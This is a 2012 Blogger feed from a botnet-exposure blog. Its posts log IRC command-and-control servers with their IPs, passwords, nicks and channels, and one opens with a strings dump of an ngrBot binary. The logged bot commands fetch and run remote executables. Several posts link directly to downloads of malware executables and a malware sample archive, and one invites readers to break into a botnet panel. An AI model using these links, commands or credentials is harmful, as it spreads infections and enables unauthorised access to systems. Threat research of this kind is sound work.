/&gt;=6&amp;gt;E&amp;gt;&lt;br /&gt;?%?4?\?&lt;br /&gt;0'0K0\0s0x0}0&lt;br /&gt;091M1g1t1&lt;br /&gt;3[3q3&lt;br /&gt;3*494&lt;br /&gt;4-575w5~5&lt;br /&gt;5B6L6&lt;br /&gt;6(7I7]7z7&lt;br /&gt;848_9m9w9&lt;br /&gt;:+:1:7:D:Q:V:e:t:&lt;br /&gt;; ;,;8;L;Q;V;n;s;x;};&lt;br /&gt;;5&amp;lt;B&amp;lt;]&amp;lt;w&amp;lt;&lt;br /&gt;=5===B=N=S=g=l=&lt;br /&gt;5&amp;quot;6-6B6L6Q6c6u6&lt;br /&gt;7 70767=7L7R7&lt;br /&gt;94:{:&lt;br /&gt;'010&lt;br /&gt;1.1F1^1&lt;br /&gt;2(2&amp;gt;2P2b2t2&lt;br /&gt;4K5f5&lt;br /&gt;6=6K6Y6&lt;br /&gt;7*7/7L7S7r7&lt;br /&gt;8]8i8&lt;br /&gt;9+9;9A9G9d9q9w9}9&lt;br /&gt;9/:b:h:&lt;br /&gt;;!;S;`;h;s;&lt;br /&gt;;E&amp;lt;e&amp;lt;w&amp;lt;&lt;br /&gt;=.=&amp;lt;=A=F=L=R=k=u=&lt;br /&gt;&amp;gt;#&amp;gt;,&amp;gt;X&amp;gt;&lt;br /&gt;?-?\?y?&lt;br /&gt;42484T4`4f4&lt;br /&gt;4X5]5&amp;#124;5&lt;br /&gt;6-646D6Q6[6b6g6q6z6&lt;br /&gt;9 9&amp;amp;9&amp;lt;9G9R9W9\9q9v9&lt;br /&gt;9::G:M:b:j:z:&lt;br /&gt;;.;6;;;B;H;S;c;k;&lt;br /&gt;&amp;lt;+&amp;lt;F&amp;lt;T&amp;lt;`&amp;lt;&lt;br /&gt;=3=E=Q=&lt;br /&gt;&amp;gt;3&amp;gt;T&amp;gt;k&amp;gt;z&amp;gt;&lt;br /&gt;?Z?r?{?&lt;br /&gt;%0&amp;lt;0V0h0&lt;br /&gt;141&amp;gt;1l1&lt;br /&gt;3g3r3&lt;br /&gt;3\4c4&lt;br /&gt;5*585R5w5&lt;br /&gt;6!6&amp;lt;6R6a6&lt;br /&gt;7=7C7T7g7z7&lt;br /&gt;8-9L9w9&lt;br /&gt;9-:D:W:&lt;br /&gt;;#;4;:;T;Z;&lt;br /&gt;&amp;lt;#&amp;lt;(&amp;lt;-&amp;lt;2&amp;lt;7&amp;lt;P&amp;lt;j&amp;lt;w&amp;lt;&lt;br /&gt;=)=.=K=[=`=}=&lt;br /&gt;&amp;gt;+&amp;gt;I&amp;gt;V&amp;gt;[&amp;gt;s&amp;gt;z&amp;gt;&lt;br /&gt;?*?H?T?a?g?u?&lt;br /&gt;0,0J0Z0g0l0v0&lt;br /&gt;1%101=1C1I1W1s1y1&lt;br /&gt;2'212&amp;lt;2J2_2&lt;br /&gt;3&amp;quot;3@3P3V3&lt;br /&gt;4)4J4h4x4&lt;br /&gt;535Q5s5&lt;br /&gt;6!6.656D6S6`6m6z6&lt;br /&gt;7?7E7&lt;br /&gt;7'8,818[8w8&lt;br /&gt;8.9K9V9s9&lt;br /&gt;:':,:D:T:Y:r:&lt;br /&gt;;2;7;W;r;w;&amp;#124;;&lt;br /&gt;&amp;lt;$&amp;lt;5&amp;lt;&amp;lt;&amp;lt;F&amp;lt;N&amp;lt;b&amp;lt;&lt;br /&gt;=(=I=O=Z=r=&amp;#124;=&lt;br /&gt;&amp;gt;V&amp;gt;g&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;&amp;gt;#?h?&lt;br /&gt;0-070D0x0&lt;br /&gt;0@1G1&lt;br /&gt;132D2Z2p2&lt;br /&gt;3*343=3R3^3&lt;br /&gt;3-434=4F5P5]5&lt;br /&gt;536N6[6&lt;br /&gt;637B7U7d7q7&lt;br /&gt;818&amp;gt;8T8]8&amp;#124;8&lt;br /&gt;9T9`9o9u9z9&lt;br /&gt;:!:,:3:;:A:O:Y:f:l:r:&lt;br /&gt;;(;3;9;?;Q;];c;i;{;&lt;br /&gt;&amp;lt;&amp;amp;&amp;lt;3&amp;lt;8&amp;lt;G&amp;lt;T&amp;lt;Z&amp;lt;`&amp;lt;n&amp;lt;&lt;br /&gt;&amp;lt;,=3=A=G=W=w=&amp;#124;=&lt;br /&gt;&amp;gt;@&amp;gt;E&amp;gt;\&amp;gt;&lt;br /&gt;&amp;gt;W?`?&lt;br /&gt;010C0H0M0a0f0k0&lt;br /&gt;1 1$1&amp;lt;1M1U1&lt;br /&gt;1-2O2z2&lt;br /&gt;3I3Z3o3z3&lt;br /&gt;4&amp;quot;4'4&amp;lt;4U4_4t4z4&lt;br /&gt;575=5r5&amp;#124;5&lt;br /&gt;6(6=6P6m6z6&lt;br /&gt;7 767&amp;lt;7~7&lt;br /&gt;8A8F8Y8c8j8&lt;br /&gt;999C9&lt;br /&gt;:%:,:3:=:F:e:&lt;br /&gt;;+;=;D;X;];c;i;n;&lt;br /&gt;;.&amp;lt;4&amp;lt;;&amp;lt;@&amp;lt;e&amp;lt;p&amp;lt;w&amp;lt;&lt;br /&gt;=&amp;quot;=*=0=;=F=O=Z=b=g=v={=&lt;br /&gt;=7&amp;gt;N&amp;gt;W&amp;gt;]&amp;gt;&lt;br /&gt;&amp;gt;&amp;amp;?7?~?&lt;br /&gt;40;0A0Q0a0&lt;br /&gt;2)2A2[2&lt;br /&gt;2T3]3f5&lt;br /&gt;6F6Y6t6&lt;br /&gt;7I7Y7_7e7k7q7w7}7&lt;br /&gt;8*808;8~8&lt;br /&gt;9 9O9X9^9&lt;br /&gt;9$:0:Q:&lt;br /&gt;:&amp;amp;;2;8;F;&lt;br /&gt;&amp;lt;&amp;quot;&amp;lt;2&amp;lt;=&amp;lt;Q&amp;lt;W&amp;lt;i&amp;lt;&lt;br /&gt;=$=*=4=:=E=K=S=e=&lt;br /&gt;&amp;gt;;&amp;gt;I&amp;gt;&lt;br /&gt;?!?F?M?W?&lt;br /&gt;1$1&amp;lt;1I1[1g1&lt;br /&gt;2%2&amp;gt;2V2a2t2&amp;#124;2&lt;br /&gt;373E3M3a3l3&lt;br /&gt;3@4N4U4&lt;br /&gt;5/565&amp;lt;5R5k5&lt;br /&gt;666i6&lt;br /&gt;7.7M7&lt;br /&gt;8,818M8[8`8&lt;br /&gt;8?9R9&lt;br /&gt;:#:4:9:?:E:P:{:&lt;br /&gt;;#;B;U;[;b;r;&lt;br /&gt;&amp;lt;!&amp;lt;o&amp;lt;&lt;br /&gt;=$=;=C=N=S=X=i=n=s=}=&lt;br /&gt;&amp;gt;&amp;quot;&amp;gt;(&amp;gt;.&amp;gt;4&amp;gt;:&amp;gt;@&amp;gt;F&amp;gt;L&amp;gt;R&amp;gt;X&amp;gt;^&amp;gt;d&amp;gt;j&amp;gt;p&amp;gt;v&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;?B?H?N?T?Z?`?f?l?r?x?~?&lt;br /&gt;4 4$4(4,4044484&amp;lt;4@4D4H4L4P4T4X6\6`6h6l6p6t6x6&amp;#124;6&lt;br /&gt;6X7b7f7p7t7~7&lt;br /&gt;8 8$8(8,808H9T9`9l9x9&lt;br /&gt;: :,:8:D:P:\:h:t:&lt;br /&gt;;(;4;@;L;X;d;p;&amp;#124;;&lt;br /&gt;&amp;lt; &amp;lt;$&amp;lt;(&amp;lt;,&amp;lt;0&amp;lt;4&amp;lt;8&amp;lt;&amp;lt;&amp;lt;@&amp;lt;D&amp;lt;H&amp;lt;L&amp;lt;P&amp;lt;T&amp;lt;X&amp;lt;\&amp;lt;`&amp;lt;d&amp;lt;h&amp;lt;l&amp;lt;p&amp;lt;t&amp;lt;x&amp;lt;&amp;#124;&amp;lt;&lt;br /&gt;H5L5P5T5X5\5`5d5h5l5p5t5x5&amp;#124;5&lt;br /&gt;6 6$6(6,6064686&amp;lt;6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6&amp;#124;6&lt;br /&gt;7 7$7(7,7074787&amp;lt;7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7&amp;#124;7&lt;br /&gt;8 8$8(8,8084888&amp;lt;8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8&amp;#124;8&lt;br /&gt;9 9$9(9,9094989&amp;lt;9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9&amp;#124;9&lt;br /&gt;: :`:l:x:&lt;br /&gt;; ;(;,;0;8;&amp;lt;;@;H;L;P;X;\;`;h;l;p;x;&amp;#124;;&lt;br /&gt;&amp;lt; &amp;lt;$&amp;lt;(&amp;lt;0&amp;lt;4&amp;lt;8&amp;lt;&amp;lt;&amp;lt;@&amp;lt;H&amp;lt;L&amp;lt;P&amp;lt;T&amp;lt;X&amp;lt;`&amp;lt;d&amp;lt;h&amp;lt;l&amp;lt;p&amp;lt;x&amp;lt;&amp;#124;&amp;lt;&lt;br /&gt;= =$=(=,=0=8=&amp;lt;=@=D=H=P=T=X=\=`=h=l=p=t=x=&lt;br /&gt;&amp;gt; &amp;gt;(&amp;gt;,&amp;gt;4&amp;gt;8&amp;gt;@&amp;gt;D&amp;gt;L&amp;gt;P&amp;gt;X&amp;gt;\&amp;gt;h&amp;gt;p&amp;gt;x&amp;gt;&lt;br /&gt;&lt;br /&gt;Unicode Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Ajjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;$jjj&lt;br /&gt;Ajjj&lt;br /&gt;DBWIN&lt;br /&gt;\\.\pipe&lt;br /&gt;kernel32.dll&lt;br /&gt;ntdll.dll&lt;br /&gt;Internet Explorer\1explore.exe&lt;br /&gt;autorun.inf&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;flock.ex&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;1explore.exe&lt;br /&gt;f1refox.exe&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;Microsoft Unified Security Protocol Provider&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;l&amp;quot;%s&amp;quot; %S&lt;br /&gt;POST&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;n127.0.0.1&lt;br /&gt;%s:Zone.Identifier&lt;br /&gt;wininet.dll&lt;br /&gt;secur32.dll&lt;br /&gt;ws2_32.dll&lt;br /&gt;:%S%S\Desktop.ini&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;Aadvapi32.dll&lt;br /&gt;urlmon.dll&lt;br /&gt;nspr4.dll&lt;br /&gt;dnsapi.dll&lt;br /&gt;Akernel23.dll&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;Shell&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/95.211.165.62&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6183406053528500643?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6183406053528500643/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/9521116562ngrbot-hosted-in-netherlands.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6183406053528500643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6183406053528500643'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/9521116562ngrbot-hosted-in-netherlands.html' title='d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2277659904523217123</id><published>2012-01-17T18:25:00.000+01:00</published><updated>2012-01-17T18:25:46.950+01:00</updated><title type='text'>193.107.16.22(irc botnet hosted in Seychelles Ideal Solution Ltd)</title><content type='html'>Server:&lt;br /&gt;193.107.16.22:8718&lt;br /&gt;&lt;br /&gt;nick:&lt;br /&gt;pSLXmPY&lt;br /&gt;&lt;br /&gt;user:&lt;br /&gt;wqvryekc&lt;br /&gt;&lt;br /&gt;chanel:&lt;br /&gt;#c&lt;br /&gt;&lt;br /&gt;Now talking in #c&lt;br /&gt;Topic On: [ #c ] [ =dOgdsa09MhlSUc9X89Kr0zVOWZeVEgEv3wA1/TshQtxNUaWqoxiIxkURBNl9r/5JGhteretdAQXvU1kBsZEpDZNZJfkv ]&lt;br /&gt;Topic By: [ r ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.16.22&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2277659904523217123?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2277659904523217123/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/1931071622irc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2277659904523217123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2277659904523217123'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/1931071622irc-botnet-hosted-in.html' title='193.107.16.22(irc botnet hosted in Seychelles Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7147434879890305191</id><published>2012-01-17T18:10:00.000+01:00</published><updated>2012-01-17T18:10:38.437+01:00</updated><title type='text'>80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)</title><content type='html'>Remote Host Port Number&lt;br /&gt;109.68.190.217 80&lt;br /&gt;199.15.234.7 80&lt;br /&gt;80.79.112.66 5749 PASS axplm2&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}psbmdzo&lt;br /&gt;USER psbmdzo 0 0 :psbmdzo&lt;br /&gt;JOIN #chat Amx4k&lt;br /&gt;PRIVMSG win7elite :[d="http://109.68.190.217/alms22.exe" s="150528 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0&lt;br /&gt;&lt;br /&gt;exe file:&lt;br /&gt;&lt;a href="http://4154afc9.seriousdeals.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/8CDE18EDF2DA4D51976266A98F94A69F/alms22.exe"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/80.79.112.66&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7147434879890305191?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7147434879890305191/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/807911266ngrbot-hosted-in-estonia.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7147434879890305191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7147434879890305191'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/807911266ngrbot-hosted-in-estonia.html' title='80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3197732268913290116</id><published>2012-01-14T01:57:00.001+01:00</published><updated>2012-01-14T02:03:49.156+01:00</updated><title type='text'>67Mb Malware Samples</title><content type='html'>This package have alot of irc bot and banking trojans samples inside&lt;br /&gt;have fun exploring samples&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3f116a49.seriousdeals.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.crocko.com/17B3E1130750450BA4220169EE2FF491/samples.zip"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3197732268913290116?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3197732268913290116/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/67mb-malware-samples.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3197732268913290116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3197732268913290116'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/67mb-malware-samples.html' title='67Mb Malware Samples'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2314511104186227164</id><published>2012-01-12T17:22:00.001+01:00</published><updated>2012-01-12T17:23:26.389+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus.Win32.Nimnul.a'/><title type='text'>Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)</title><content type='html'>Hosted in USA also called Ramnit by other antiviruses&lt;br /&gt;what this malware does:&lt;br /&gt;&lt;blockquote&gt;Capability to send out email message(s) with the built-in SMTP client engine. &lt;br /&gt;Produces outbound traffic. &lt;br /&gt;Communication with a remote SMTP server and sending out email. &lt;br /&gt;Downloads/requests other files from Internet. &lt;br /&gt;Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode. &lt;br /&gt;Creates a startup registry entry.&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote&gt;The data identified by the following URLs was then requested from the remote web server:&lt;br /&gt;http://mozilla.snt.utwente.nl/firefox/releases/9.0.1/win32/en-US/Firefox%20Setup%209.0.1.exe&lt;br /&gt;http://96.9.139.213/stat2.php&lt;br /&gt;http://96.9.139.213/stat1.php&lt;/blockquote&gt;&lt;br /&gt;Here the panel:&lt;br /&gt;http://96.9.139.213/ u have to find a way to gain access because it ask for username and passwd lol&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/96.9.139.213&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2314511104186227164?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2314511104186227164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/viruswin32nimnula-malware-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2314511104186227164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2314511104186227164'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/viruswin32nimnula-malware-hosted-in.html' title='Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8945743305853305921</id><published>2012-01-11T19:36:00.002+01:00</published><updated>2012-01-11T19:36:53.669+01:00</updated><title type='text'>87.76.29.62(irc botnet hosted in United Kingdom Future Hosting Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;87.76.29.62 4443&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}3443373&lt;br /&gt;USER 3443373 "" "3443373" :3443373&lt;br /&gt;MODE New{US-XP-x86}3443373 +iMm&lt;br /&gt;JOIN #new&lt;br /&gt;PONG 422&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/87.76.29.62&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8945743305853305921?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8945743305853305921/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/87762962irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8945743305853305921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8945743305853305921'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/87762962irc-botnet-hosted-in-united.html' title='87.76.29.62(irc botnet hosted in United Kingdom Future Hosting Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1840952637363975886</id><published>2012-01-11T19:14:00.000+01:00</published><updated>2012-01-11T19:14:59.508+01:00</updated><title type='text'>119.59.99.160(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)</title><content type='html'>Remote Host Port Number&lt;br /&gt;119.59.99.160 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|98932]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-6625 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|98932] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;Now talking in #!loco!&lt;br /&gt;Topic On: [ #!loco! ] [ .m.s|.m.e Foto http://goo.gl/JfWS5?= ]&lt;br /&gt;Topic By: [ wd11 ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/119.59.99.160&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1840952637363975886?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1840952637363975886/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/1195999160irc-botnet-hosted-in-thailand.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1840952637363975886'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1840952637363975886'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/1195999160irc-botnet-hosted-in-thailand.html' title='119.59.99.160(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5176694320116434030</id><published>2012-01-10T22:51:00.000+01:00</published><updated>2012-01-10T22:51:04.091+01:00</updated><title type='text'>timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)</title><content type='html'>timununyeri.co.cc 94.102.0.65&lt;br /&gt;&lt;br /&gt;Opened listening TCP connection on port: 113&lt;br /&gt;C&amp;C Server: 94.102.0.65:6667&lt;br /&gt;Server Password: &lt;br /&gt;Username: arpsc&lt;br /&gt;Nickname: DEU|43304&lt;br /&gt;Channel: #hack (Password: timu) &lt;br /&gt;Channeltopic: :&lt;br /&gt;&lt;br /&gt;Now talking in #hack&lt;br /&gt;Topic On: [ #hack ] [ .dl http://www.osmarimoveis-rs.com.br/ex.exe c:/ex.exe 1 ]&lt;br /&gt;Topic By: [ infeCTeD ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/94.102.0.65&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5176694320116434030?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5176694320116434030/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/timununyericoccirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5176694320116434030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5176694320116434030'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/timununyericoccirc-botnet-hosted-in.html' title='timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1551161045575408148</id><published>2012-01-10T20:37:00.000+01:00</published><updated>2012-01-10T20:37:37.618+01:00</updated><title type='text'>174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;174.140.165.107 6667 PASS mystic&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}4733047&lt;br /&gt;USER 4733047 "" "4733047" :4733047&lt;br /&gt;MODE New{US-XP-x86}4733047 +iMm&lt;br /&gt;JOIN #Boss&lt;br /&gt;PONG :Mystical.gov&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/174.140.165.107&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1551161045575408148?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1551161045575408148/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/174140165107irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' 